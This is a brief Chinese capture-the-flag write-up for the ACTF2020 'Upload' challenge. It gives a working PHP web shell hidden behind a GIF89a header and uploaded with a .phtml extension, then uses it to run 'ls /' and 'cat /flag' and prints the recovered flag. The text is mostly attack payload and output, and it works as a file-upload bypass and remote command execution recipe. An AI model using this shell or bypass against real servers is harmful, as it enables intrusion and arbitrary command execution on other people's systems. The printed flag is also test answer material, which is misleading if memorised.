[ACTF2020 新生赛]Upload

打开页面，点击灯泡出现上传按钮

上传phtml_get.phtml的shell文件，文件内容为:

GIF89a
<script language='php'>@eval($_GET['aa']);</script>

访问文件，使用system命令查看/upload/phtml_get.phtml?aa=system("ls /");，得到

GIF89a bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

使用cat命令查看flag文件

/upload/phtml_get.phtml?aa=system("cat /flag");

得到GIF89a flag{45a0dcee-0fde-4d81-8fac-9eb68ca911bb}